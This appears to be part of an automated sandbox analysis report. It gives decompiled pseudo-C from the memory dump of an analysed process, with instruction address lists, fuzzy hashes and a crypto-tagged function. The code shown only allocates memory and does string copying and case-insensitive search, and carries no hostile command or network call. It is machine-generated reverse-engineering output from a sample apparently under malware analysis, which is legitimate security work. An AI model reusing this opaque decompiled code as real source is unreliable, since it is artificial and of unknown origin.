					_v64 = (_t338 >> 5 >> 0x1a) + _t338 >> 6;
					_t339 = _t338 & 0x8000003f;
					if(_t339 < 0) {
						_t339 = (_t339 - 0x00000001 | 0xffffffc0) + 1;
					}
					_t342 = _v64 + (0 | _t339 > 0x00000000) << 6;
					_v64 = _t342;
					_push(_t342);
					_t269 = E003B1030();
					_t552 = _t552 + 4;
					_t343 = _v44;
					if(_t343 == 0) {
						 *_t269 = 0;
					} else {
						if(_t269 != 0) {
							_t458 =  *_t343;
							 *_t269 = _t458;
							if(_t458 != 0) {
								_v24 = _t306;
								_t315 = 0;
								_v68 = _t496;
								while(1) {
									_t315 = _t315 + 1;
									_t460 =  *((char*)(_t343 + _t315 * 2 - 1));
									 *((char*)(_t269 + _t315 * 2 - 1)) = _t460;
									if(_t460 == 0) {
										break;
									}
									_t461 =  *((char*)(_t343 + _t315 * 2));
									 *((char*)(_t269 + _t315 * 2)) = _t461;
									if(_t461 != 0) {
										continue;
									}
									break;
								}
								_t306 = _v24;
								_t496 = _v68;
							}
						}
						_push(1);
						_push(_t343);
						_v68 = _t269;
						E003B10B0();
						_t269 = _v68;
						_t552 = _t552 + 8;
					}
					_v40 = _v64;
					_v44 = _t269;
				} else {
					_t269 = _v44;
				}
				goto L124;
			}

0x003c62fc
0x003c62fe
0x003c6300
0x003c6304
0x003c6306
0x003c630e
0x003c6310
0x003c6313
0x003c6317
0x003c6354
0x003c6319
0x003c631b
0x003c631d
0x003c6320
0x003c6324
0x003c6326
0x003c6329
0x003c632b
0x003c632b
0x003c632c
0x003c6331
0x003c6337
0x00000000
0x00000000
0x003c6339
0x003c633d
0x003c6342
0x00000000
0x00000000
0x00000000
0x003c6342
0x003c6344
0x003c6344
0x003c6324
0x003c6347
0x003c6349
0x003c634a
0x003c634f
0x003c634f
0x003c635c
0x003c6364
0x003c6365
0x003c6367
0x003c636a
0x003c636f
0x003c6372
0x003c6378
0x003c63d5
0x003c63d8
0x003c63e0
0x00000000
0x003c637a
0x003c637c
0x003c6dc0
0x003c6dc2
0x003c6dc3
0x003c6dc8
0x003c6dcb
0x003c6dd3
0x003c6dd5
0x00000000
0x003c6382
0x003c6382
0x003c6385
0x003c6389
0x003c638b
0x003c6393
0x003c6395
0x003c6398
0x003c6398
0x003c6399
0x003c639e
0x003c63a4
0x00000000
0x00000000
0x003c63a6
0x003c63aa
0x003c63af
0x00000000
0x00000000
0x00000000
0x003c63af
0x003c63b1
0x003c63b1
0x003c63b4
0x003c63b6
0x003c63b7
0x003c63bb
0x003c63c0
0x003c63c4
0x003c63c7
0x003c63cf
0x003c63e4
0x003c63e6
0x003c63e9
0x003c6401
0x003c6405
0x003c6411
0x003c6417
0x003c6417
0x003c641c
0x003c6420
0x003c6426
0x00000000
0x00000000
0x003c642c
0x003c6431
0x00000000
0x003c6433
0x003c6439
0x003c644e
0x003c644e
0x00000000
0x003c643b
0x003c643b
0x003c6445
0x003c644c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c644c
0x00000000
0x003c643b
0x003c6439
0x00000000
0x003c6431
0x003c6eb0
0x003c6eb3
0x00000000
0x003c63eb
0x003c63ed
0x003c63ef
0x003c63f2
0x003c63fc
0x003c63ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c63ff
0x003c6e93
0x003c6e96
0x003c6453
0x003c6453
0x003c6ea4
0x003c6ea4
0x003c6ea7
0x003c6ea7
0x00000000
0x003c68ea
0x003c68ea
0x003c68ee
0x003c68f6
0x003c68fb
0x003c6b4d
0x003c6b51
0x003c6b55
0x003c6b59
0x003c6b63
0x003c6b65
0x003c6b6d
0x003c6b7d
0x003c6b84
0x003c6baf
0x003c6bb5
0x003c6d25
0x003c6d29
0x003c6d2b
0x003c6d2b
0x003c6d32
0x003c6d34
0x003c6d3b
0x003c6d3d
0x003c6d40
0x003c6d44
0x003c6d83
0x003c6d46
0x003c6d48
0x003c6d4a
0x003c6d4d
0x003c6d51
0x003c6d53
0x003c6d57
0x003c6d59
0x003c6d59
0x003c6d5a
0x003c6d5f
0x003c6d65
0x00000000
0x00000000
0x003c6d67
0x003c6d6b
0x003c6d70
0x00000000
0x00000000
0x00000000
0x003c6d70
0x003c6d72
0x003c6d72
0x003c6d51
0x003c6d76
0x003c6d78
0x003c6d79
0x003c6d7e
0x003c6d7e
0x00000000
0x003c6d44
0x003c6bc4
0x003c6bc6
0x003c6bc9
0x003c6be1
0x003c6be5
0x003c6bf1
0x003c6bf7
0x003c6bf7
0x003c6bfc
0x003c6c00
0x003c6c06
0x00000000
0x00000000
0x003c6c0c
0x003c6c11
0x00000000
0x003c6c13
0x003c6c19
0x003c6c2e
0x003c6c2e
0x003c6c1b
0x003c6c1b
0x003c6c25
0x003c6c2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c6c2c
0x00000000
0x003c6c1b
0x003c6c19
0x00000000
0x003c6c11
0x003c6e2f
0x003c6e32
0x00000000
0x003c6bcb
0x003c6bcd
0x003c6bcf
0x003c6bd2
0x003c6bdc
0x003c6bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c6bdf
0x003c6e14
0x003c6e17
0x003c6e1d
0x003c6e21
0x003c6e27
0x003c6e27
0x003c6e21
0x003c6e17
0x003c6c33
0x003c6c38
0x003c6c3e
0x003c6c44
0x003c6c5a
0x003c6c5e
0x003c6c64
0x003c6c6c
0x003c6c6c
0x003c6c7a
0x003c6c7d
0x003c6c81
0x003c6c87
0x003c6c89
0x003c6c8c
0x003c6c90
0x003c6cdf
0x003c6c92
0x003c6c94
0x003c6c96
0x003c6c99
0x003c6c9d
0x003c6ca1
0x003c6ca4
0x003c6ca8
0x003c6caa
0x003c6caa
0x003c6cab
0x003c6cb0
0x003c6cb6
0x00000000
0x00000000
0x003c6cb8
0x003c6cbc
0x003c6cc1
0x00000000
0x00000000
0x00000000
0x003c6cc1
0x003c6cc3
0x003c6cc6
0x003c6cc6
0x003c6c9d
0x003c6cca
0x003c6ccc
0x003c6ccd
0x003c6cd1
0x003c6cd6
0x003c6cda
0x003c6cda
0x003c6ce6
0x003c6ce9
0x003c6c46
0x003c6c46
0x003c6c46
0x003c6ceb
0x003c6cef
0x003c6cfd
0x003c6d01
0x003c6d03
0x003c6d09
0x003c6d09
0x003c6d0c
0x003c6d0d
0x003c6d11
0x00000000
0x00000000
0x003c6d1d
0x00000000
0x003c6d23
0x003c6d07
0x003c6d08
0x00000000
0x003c6d08
0x00000000
0x003c6d1d
0x00000000
0x003c6d09
0x003c6cef
0x00000000
0x003c6b86
0x003c6b8a
0x003c6b8b
0x003c6b8c
0x003c6b8d
0x003c6b8e
0x003c6b8f
0x003c6b8f
0x003c6901
0x003c6901
0x003c6905
0x003c6908
0x003c690c
0x003c6910
0x003c6914
0x003c691e
0x003c6920
0x003c6928
0x003c6938
0x003c693f
0x003c696a
0x003c6970
0x003c6ae0
0x003c6ae4
0x003c6ae6
0x003c6ae6
0x003c6aed
0x003c6af3
0x003c6afa
0x003c6afc
0x003c6aff
0x003c6b03
0x003c6b45
0x003c6b05
0x003c6b07
0x003c6b09
0x003c6b0c
0x003c6b10
0x003c6b12
0x003c6b16
0x003c6b18
0x003c6b18
0x003c6b19
0x003c6b1e
0x003c6b24
0x00000000
0x00000000
0x003c6b26
0x003c6b2a
0x003c6b2f
0x00000000
0x00000000
0x00000000
0x003c6b2f
0x003c6b31
0x003c6b31
0x003c6b10
0x003c6b35
0x003c6b37
0x003c6b38
0x003c6b3d
0x003c6b3d
0x003c6d86
0x003c6d86
0x003c6d88
0x003c6d88
0x003c697f
0x003c6981
0x003c6984
0x003c699c
0x003c69a0
0x003c69ac
0x003c69b2
0x003c69b2
0x003c69b7
0x003c69bb
0x003c69c1
0x00000000
0x00000000
0x003c69c7
0x003c69cc
0x00000000
0x003c69ce
0x003c69d4
0x003c69e9
0x003c69e9
0x003c69d6
0x003c69d6
0x003c69e0
0x003c69e7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c69e7
0x00000000
0x003c69d6
0x003c69d4
0x00000000
0x003c69cc
0x003c6e0d
0x003c6e10
0x00000000
0x003c6986
0x003c6988
0x003c698a
0x003c698d
0x003c6997
0x003c699a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c699a
0x003c6df2
0x003c6df5
0x003c6dfb
0x003c6dff
0x003c6e05
0x003c6e05
0x003c6dff
0x003c6df5
0x003c69ee
0x003c69f3
0x003c69f9
0x003c69ff
0x003c6a15
0x003c6a19
0x003c6a1f
0x003c6a27
0x003c6a27
0x003c6a35
0x003c6a38
0x003c6a3c
0x003c6a42
0x003c6a44
0x003c6a47
0x003c6a4b
0x003c6a9a
0x003c6a4d
0x003c6a4f
0x003c6a51
0x003c6a54
0x003c6a58
0x003c6a5c
0x003c6a5f
0x003c6a63
0x003c6a65
0x003c6a65
0x003c6a66
0x003c6a6b
0x003c6a71
0x00000000
0x00000000
0x003c6a73
0x003c6a77
0x003c6a7c
0x00000000
0x00000000
0x00000000
0x003c6a7c
0x003c6a7e
0x003c6a81
0x003c6a81
0x003c6a58
0x003c6a85
0x003c6a87
0x003c6a88
0x003c6a8c
0x003c6a91
0x003c6a95
0x003c6a95
0x003c6aa1
0x003c6aa4
0x003c6a01
0x003c6a01
0x003c6a01
0x003c6aa6
0x003c6aaa
0x003c6ab8
0x003c6abc
0x003c6abe
0x003c6ac4
0x003c6ac4
0x003c6ac7
0x003c6ac8
0x003c6acc
0x00000000
0x00000000
0x003c6ad8
0x003c6dec
0x003c6dec
0x003c6ade
0x003c6ac2
0x003c6ac3
0x00000000
0x003c6ac3
0x00000000
0x003c6ad8
0x003c6de2
0x003c6de2
0x003c6de6
0x003c6de6
0x003c6aaa
0x003c6d8f
0x003c6d8f
0x003c6d91
0x003c6d92
0x003c6d9a
0x003c6d9c
0x003c6da0
0x003c6dac
0x003c6db0
0x003c6dbd
0x003c6941
0x003c6945
0x003c6946
0x003c6947
0x003c6948
0x003c6949
0x003c694a
0x003c694a
0x003c693f
0x003c68fb
0x003c63e9
0x003c637c
0x003c6458
0x003c645d
0x003c6463
0x003c6468
0x003c647d
0x003c6480
0x003c6484
0x003c648a
0x003c6492
0x003c6492
0x003c649f
0x003c64a2
0x003c64a6
0x003c64a7
0x003c64ac
0x003c64af
0x003c64b5
0x003c6504
0x003c64b7
0x003c64b9
0x003c64bb
0x003c64be
0x003c64c2
0x003c64c6
0x003c64ca
0x003c64cc
0x003c64cf
0x003c64cf
0x003c64d0
0x003c64d5
0x003c64db
0x00000000
0x00000000
0x003c64dd
0x003c64e1
0x003c64e6
0x00000000
0x00000000
0x00000000
0x003c64e6
0x003c64e8
0x003c64ec
0x003c64ec
0x003c64c2
0x003c64ef
0x003c64f1
0x003c64f2
0x003c64f6
0x003c64fb
0x003c64ff
0x003c64ff
0x003c650b
0x003c650f
0x003c646a
0x003c646a
0x003c646a
0x003c6513
0x003c651f
0x003c6524
0x003c652f
0x003c6535
0x003c6e8c
0x003c653b
0x003c653d
0x003c6540
0x003c6558
0x003c655c
0x003c6568
0x003c656e
0x003c656e
0x003c6573
0x003c6577
0x003c657d
0x00000000
0x00000000
0x003c6583
0x003c6588
0x00000000
0x003c658a
0x003c6590
0x003c65a5
0x003c65a5
0x003c6592
0x003c6592
0x003c659c
0x003c65a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c65a3
0x00000000
0x003c6592
0x003c6590
0x00000000
0x003c6588
0x003c6e85
0x003c6e88
0x00000000
0x003c6542
0x003c6544
0x003c6546
0x003c6549
0x003c6553
0x003c6556
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c6556
0x003c6e74
0x003c6e77
0x003c6e7d
0x003c6e7d
0x003c6e77
0x003c6540
0x003c65aa
0x003c65b5
0x003c65bc
0x003c65d4
0x003c65d8
0x003c65de
0x003c65e6
0x003c65e6
0x003c65f4
0x003c65f7
0x003c65fb
0x003c65fc
0x003c6601
0x003c6604
0x003c660a
0x003c6659
0x003c660c
0x003c660e
0x003c6610
0x003c6613
0x003c6617
0x003c661b
0x003c661f
0x003c6621
0x003c6624
0x003c6624
0x003c6625
0x003c662a
0x003c6630
0x00000000
0x00000000
0x003c6632
0x003c6636
0x003c663b
0x00000000
0x00000000
0x00000000
0x003c663b
0x003c663d
0x003c6641
0x003c6641
0x003c6617
0x003c6644
0x003c6646
0x003c6647
0x003c664b
0x003c6650
0x003c6654
0x003c6654
0x003c6660
0x003c6664
0x003c65be
0x003c65be
0x003c65be
0x003c6668
0x003c6670
0x003c6675
0x003c667b
0x003c6e6d
0x003c6681
0x003c6683
0x003c6686
0x003c669e
0x003c66a2
0x003c66ae
0x003c66b4
0x003c66b4
0x003c66b9
0x003c66bd
0x003c66c3
0x00000000
0x00000000
0x003c66c9
0x003c66ce
0x00000000
0x003c66d0
0x003c66d6
0x003c66eb
0x003c66eb
0x003c66d8
0x003c66d8
0x003c66e2
0x003c66e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c66e9
0x00000000
0x003c66d8
0x003c66d6
0x00000000
0x003c66ce
0x003c6e66
0x003c6e69
0x00000000
0x003c6688
0x003c668a
0x003c668c
0x003c668f
0x003c6699
0x003c669c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c669c
0x003c6e55
0x003c6e58
0x003c6e5e
0x003c6e5e
0x003c6e58
0x003c6686
0x003c66f0
0x003c66f0
0x003c66fb
0x003c6702
0x003c6712
0x003c6715
0x003c6719
0x003c671f
0x003c6727
0x003c6727
0x003c6734
0x003c6737
0x003c673b
0x003c673c
0x003c6741
0x003c6744
0x003c674a
0x003c679d
0x003c674c
0x003c674e
0x003c6750
0x003c6753
0x003c6757
0x003c675b
0x003c675f
0x003c6761
0x003c6764
0x003c6764
0x003c6765
0x003c676a
0x003c6770
0x00000000
0x00000000
0x003c6772
0x003c6776
0x003c677b
0x00000000
0x00000000
0x00000000
0x003c677b
0x003c677d
0x003c6781
0x003c6784
0x003c6784
0x003c6757
0x003c6788
0x003c678a
0x003c678b
0x003c678f
0x003c6794
0x003c6798
0x003c6798
0x003c67a4
0x003c67a8
0x003c67a8
0x003c67ac
0x003c67b0
0x003c6526
0x003c6526
0x003c6526
0x003c67b7
0x003c6e4e
0x003c67bd
0x003c67bf
0x003c67c2
0x003c67da
0x003c67de
0x003c67ea
0x003c67f0
0x003c67f0
0x003c67f5
0x003c67f9
0x003c67ff
0x00000000
0x00000000
0x003c6805
0x003c680a
0x00000000
0x003c680c
0x003c6812
0x003c6827
0x003c6827
0x003c6814
0x003c6814
0x003c681e
0x003c6825
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c6825
0x00000000
0x003c6814
0x003c6812
0x00000000
0x003c680a
0x003c6e47
0x003c6e4a
0x00000000
0x003c67c4
0x003c67c6
0x003c67c8
0x003c67cb
0x003c67d5
0x003c67d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c67d8
0x003c6e36
0x003c6e39
0x003c6e3f
0x003c6e3f
0x003c6e39
0x003c67c2
0x003c682c
0x003c6837
0x003c683e
0x003c6856
0x003c685a
0x003c6860
0x003c6868
0x003c6868
0x003c6876
0x003c6879
0x003c687d
0x003c687e
0x003c6883
0x003c6886
0x003c688c
0x003c68db
0x003c688e
0x003c6890
0x003c6892
0x003c6895
0x003c6899
0x003c689d
0x003c68a1
0x003c68a3
0x003c68a6
0x003c68a6
0x003c68a7
0x003c68ac
0x003c68b2
0x00000000
0x00000000
0x003c68b4
0x003c68b8
0x003c68bd
0x00000000
0x00000000
0x00000000
0x003c68bd
0x003c68bf
0x003c68c3
0x003c68c3
0x003c6899
0x003c68c6
0x003c68c8
0x003c68c9
0x003c68cd
0x003c68d2
0x003c68d6
0x003c68d6
0x003c68e2
0x003c68e6
0x003c6840
0x003c6840
0x003c6840
0x00000000

Strings

@, xrefs: 003C6DCB

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction ID: e2f0a6ab785baf3e7ae40112784853e0f21af4df2256e8b61c97ff0674ad6d10
Opcode Fuzzy Hash: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction Fuzzy Hash: 8B727E749087924BD71BCE39C492B2B7AD26FC5304F2DC66DD8968B3A6DA35CC41C782

Uniqueness

Uniqueness Score: -1.00%

Function 003BC590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003BC590(signed int* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short* _t304;
				unsigned int _t312;
				signed int _t313;
				signed short** _t319;
				signed short* _t323;
				signed int* _t325;
				signed int _t330;
				signed int _t334;
				signed int _t338;
				unsigned int _t340;
				unsigned int _t341;
				signed int _t343;
				unsigned int _t344;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t357;
				signed int _t360;
				unsigned int _t366;
				signed int _t367;
				void* _t373;
				signed int _t376;
				signed int _t377;
				unsigned int _t383;
				unsigned int _t384;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int* _t405;
				signed int _t406;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t426;
				signed int _t432;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t452;
				signed int _t457;
				signed int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t469;
				signed int _t476;
				signed int _t479;
				signed int _t480;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				void* _t493;
				signed int _t494;
				signed int _t495;
				signed int _t498;
				intOrPtr* _t500;
				signed int _t501;
				signed int _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t508;
				signed int _t510;
				signed int _t513;
				signed int _t518;
				void* _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				void* _t523;
				signed int _t524;
				signed int _t525;
				signed int _t528;
				signed int* _t529;
				signed int _t530;
				signed int _t534;
				signed int _t537;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t552;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t570;
				signed int _t571;
				signed int _t574;
				signed int _t581;
				signed short* _t582;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				intOrPtr* _t594;
				signed int _t595;
				signed short* _t596;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t609;
				signed int _t611;
				signed int* _t614;

				_v64 = 0;
				_t405 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t551 = E003B1030();
				_t614 = (_t611 & 0xfffffff0) - 0x34 + 4;
				_t304 = _v64;
				if(_t304 == 0) {
					__eflags = 0;
					 *_t551 = 0;
					L8:
					_v60 = 0x40;
					_v64 = _t551;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t551;
						if(_t551 == 0) {
							_t459 = 0x40;
							_t581 = 0;
							L23:
							_t24 = _t581 + 2; // -2147483652
							_t493 = _t24;
							__eflags = _t493 - 0x40;
							_t494 =  <=  ? 0x40 : _t493;
							__eflags = _t459 - _t494;
							if(_t459 < _t494) {
								_t312 = (_t494 >> 5 >> 0x1a) + _t494 >> 6;
								_t495 = _t494 & 0x8000003f;
								__eflags = _t495;
								if(_t495 < 0) {
									_t495 = (_t495 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t495;
								}
								__eflags = _t495;
								_t313 = _t312 + (0 | _t495 > 0x00000000);
								 *_t614 = _t313 << 6;
								_push(_t313 << 7);
								_t552 = E003B1030();
								_t614 =  &(_t614[1]);
								_t498 = _v64;
								__eflags = _t498;
								if(_t498 == 0) {
									__eflags = 0;
									 *_t552 = 0;
									goto L35;
								} else {
									__eflags = _t552;
									if(_t552 == 0) {
										L33:
										_push(2);
										_push(_t498);
										E003B10B0();
										_t614 =  &(_t614[2]);
										L35:
										_v60 =  *_t614;
										_v64 = _t552;
										L36:
										__eflags = 0;
										 *((short*)(_t552 + _t581 * 2)) = _a8 & 0x0000ffff;
										_t319 =  &_v64;
										 *((short*)( *_t319 + 2 + _t581 * 2)) = 0;
										L37:
										_t582 =  *_t319;
										if(_t582 == 0) {
											L39:
											_t500 = _a4;
											_push(0x80);
											 *_t500 = 0;
											 *((intOrPtr*)(_t500 + 4)) = 0;
											_t406 = E003B1030();
											_t614 =  &(_t614[1]);
											_t323 =  *_a4;
											if(_t323 == 0) {
												 *_t406 = 0;
												L60:
												_t325 = _a4;
												 *_t325 = _t406;
												_t325[1] = 0x40;
												L61:
												_push(2);
												_push(_v64);
												E003B10B0();
												_v64 = 0;
												_v60 = 0;
												return _a4;
											}
											if(_t406 == 0) {
												L45:
												_push(2);
												_push(_t323);
												E003B10B0();
												_t614 =  &(_t614[2]);
												goto L60;
											}
											_t501 =  *_t323 & 0x0000ffff;
											 *_t406 = _t501;
											if(_t501 == 0) {
												goto L45;
											}
											_t502 = 0;
											while(1) {
												_t502 = _t502 + 1;
												_t463 =  *(_t323 + _t502 * 4 - 2) & 0x0000ffff;
												 *(_t406 + _t502 * 4 - 2) = _t463;
												if(_t463 == 0) {
													goto L45;
												}
												_t464 =  *(_t323 + _t502 * 4) & 0x0000ffff;
												 *(_t406 + _t502 * 4) = _t464;
												if(_t464 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t330 =  *_t582 & 0x0000ffff;
										if(_t330 != 0) {
											_t554 =  *_t405;
											__eflags = _t554;
											if(_t554 == 0) {
												L52:
												_t503 = _a4;
												_push(0x80);
												 *_t503 = 0;
												 *((intOrPtr*)(_t503 + 4)) = 0;
												_t406 = E003B1030();
												_t614 =  &(_t614[1]);
												_t334 =  *_a4;
												__eflags = _t334;
												if(_t334 == 0) {
													__eflags = 0;
													 *_t406 = 0;
													goto L60;
												}
												__eflags = _t406;
												if(_t406 == 0) {
													L58:
													_push(2);
													_push(_t334);
													E003B10B0();
													_t614 =  &(_t614[2]);
													goto L60;
												}
												_t504 =  *_t334 & 0x0000ffff;
												 *_t406 = _t504;
												__eflags = _t504;
												if(_t504 == 0) {
													goto L58;
												}
												_t505 = 0;
												__eflags = 0;
												while(1) {
													_t505 = _t505 + 1;
													_t465 =  *(_t334 + _t505 * 4 - 2) & 0x0000ffff;
													 *(_t406 + _t505 * 4 - 2) = _t465;
													__eflags = _t465;
													if(_t465 == 0) {
														goto L58;
													}
													_t466 =  *(_t334 + _t505 * 4) & 0x0000ffff;
													 *(_t406 + _t505 * 4) = _t466;
													__eflags = _t466;
													if(_t466 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t554 & 0x0000ffff;
											if(( *_t554 & 0x0000ffff) == 0) {
												goto L52;
											}
											_v24 = _t582;
											__eflags = _t330 - 0x41 - 0x19;
											_t337 =  <=  ? _t330 + 0x20 : _t330;
											_t508 = 0;
											__eflags = 0;
											_t338 = ( <=  ? _t330 + 0x20 : _t330) & 0x0000ffff;
											_v44 = _t338;
											while(1) {
												_t584 =  *(_t554 + _t508 * 2) & 0x0000ffff;
												_t67 = _t584 - 0x41; // 0x7fffffbe
												__eflags = _t67 - 0x19;
												_t68 = _t584 + 0x20; // 0x8000001f
												_t585 =  <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) - _t338;
												if(( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) == _t338) {
													break;
												}
												_t508 = _t508 + 1;
												__eflags =  *(_t554 + _t508 * 2) & 0x0000ffff;
												if(( *(_t554 + _t508 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L52;
											}
											_t586 = _v24;
											_t469 = _t554 + _t508 * 2;
											__eflags = _t469;
											if(_t469 == 0) {
												goto L52;
											}
											_t510 = _t586 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t340 = _t510 & 0x00000001;
											_t412 =  ~_t510 + 0x10 >> 1;
											_v52 = _t412;
											_v36 = _t554;
											_v24 = _t586;
											_t555 = _t412;
											while(1) {
												L68:
												_t587 = _t510;
												__eflags = _t510;
												if(_t510 == 0) {
													goto L74;
												}
												_t421 = 0;
												__eflags = _t340;
												if(_t340 != 0) {
													L78:
													_v28 = _t340;
													_t603 = _v24;
													while(1) {
														__eflags =  *(_t603 + _t421 * 2) & 0x0000ffff;
														if(( *(_t603 + _t421 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t421 = _t421 + 1;
														__eflags = _t421 - 0x7fffffff;
														if(_t421 < 0x7fffffff) {
															continue;
														}
														_v24 = _t603;
														_t341 = _v28;
														L82:
														_t421 = 0x7fffffff;
														L83:
														 *_t614 = _t421;
														_t588 = 0;
														__eflags = 0;
														_v32 = _t510;
														_v28 = _t341;
														while(1) {
															_t422 =  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t124 = _t422 - 0x61; // 0x7fffff9e
															_t559 =  *(_v24 + _t588 * 2) & 0x0000ffff;
															__eflags = _t124 - 0x19;
															_t127 = _t422 - 0x20; // 0x7fffffdf
															_t423 =  <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t343 = ( <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff) & 0x0000ffff;
															__eflags = _t559 - 0x61 - 0x19;
															_t560 =  <=  ? _t559 - 0x20 : _t559;
															__eflags = _t343 - ( <=  ? _t559 - 0x20 : _t559);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t343;
															if(_t343 == 0) {
																L88:
																_t510 = _v32;
																_t341 = _v28;
																_t563 = _v36;
																_t591 = _v24;
																L89:
																__eflags = _t469;
																if(_t469 == 0) {
																	goto L52;
																}
																_v28 = _t341;
																_v36 = _t563;
																_v24 = _t591;
																_t592 = 0;
																__eflags = 0;
																while(1) {
																	L91:
																	_t564 = _t469;
																	_t349 = _t469 + 2;
																	__eflags = _t349;
																	if(_t349 == 0) {
																		break;
																	}
																	__eflags =  *(_t469 + 2) & 0x0000ffff;
																	if(( *(_t469 + 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	 *_t614 = _t564;
																	_t443 = _t592;
																	_v32 = _t510;
																	while(1) {
																		_t443 = _t443 + 1;
																		_t596 = _t469 + _t443 * 2;
																		_t537 =  *_t596 & 0x0000ffff;
																		__eflags = ( *(_t349 + _t443 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																		_v48 = _t596;
																		_t538 =  <=  ? _t537 + 0x20 : _t537;
																		__eflags = ( <=  ? _t537 + 0x20 : _t537) - _v44;
																		if(( <=  ? _t537 + 0x20 : _t537) == _v44) {
																			break;
																		}
																		__eflags =  *(_t349 + _t443 * 2) & 0x0000ffff;
																		if(( *(_t349 + _t443 * 2) & 0x0000ffff) != 0) {
																			continue;
																		}
																		L96:
																		_t510 = _v32;
																		_t350 = _v28;
																		_t565 = _v36;
																		_t593 = _v24;
																		L97:
																		__eflags = _t510;
																		if(_t510 == 0) {
																			L102:
																			_t476 =  ~( ~_t510 + 0x00000007 & 0x00000007) + 0x7fffffff;
																			__eflags = _t476;
																			while(1) {
																				asm("movdqu xmm1, [esi+edx*2]");
																				asm("pcmpeqw xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t350;
																				if(_t350 != 0) {
																					break;
																				}
																				_t510 = _t510 + 8;
																				__eflags = _t510 - _t476;
																				if(_t510 < _t476) {
																					continue;
																				}
																				__eflags = _t476 - 0x7fffffff;
																				if(_t476 >= 0x7fffffff) {
																					L108:
																					_t476 = 0x7fffffff;
																					L109:
																					_t352 = _t565 & 0x0000000f;
																					__eflags = _t352;
																					if(_t352 == 0) {
																						L114:
																						_t432 =  ~( ~_t352 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t432;
																						while(1) {
																							asm("movdqu xmm1, [edi+eax*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb edx, xmm1");
																							__eflags = _t510;
																							if(_t510 != 0) {
																								break;
																							}
																							_t352 = _t352 + 8;
																							__eflags = _t352 - _t432;
																							if(_t352 < _t432) {
																								continue;
																							}
																							__eflags = _t432 - 0x7fffffff;
																							if(_t432 >= 0x7fffffff) {
																								L120:
																								_t432 = 0x7fffffff;
																								L121:
																								_t594 = _a4;
																								_t518 =  *_t614 - _t565 + _t476 * 2 >> 1;
																								__eflags = _t518;
																								 *_t594 = 0;
																								_t519 =  <=  ? 0 : _t518;
																								__eflags = _t432 - _t519;
																								 *((intOrPtr*)(_t594 + 4)) = 0;
																								_t520 =  <  ? _t432 : _t519;
																								_t434 = _t432 - _t520;
																								_t566 = _t565 + _t520 * 2;
																								__eflags = _t566;
																								if(_t566 == 0) {
																									L156:
																									_push(0x80);
																									_t406 = E003B1030();
																									_t614 =  &(_t614[1]);
																									_t357 =  *_a4;
																									__eflags = _t357;
																									if(_t357 == 0) {
																										 *_t406 = 0;
																										goto L60;
																									}
																									__eflags = _t406;
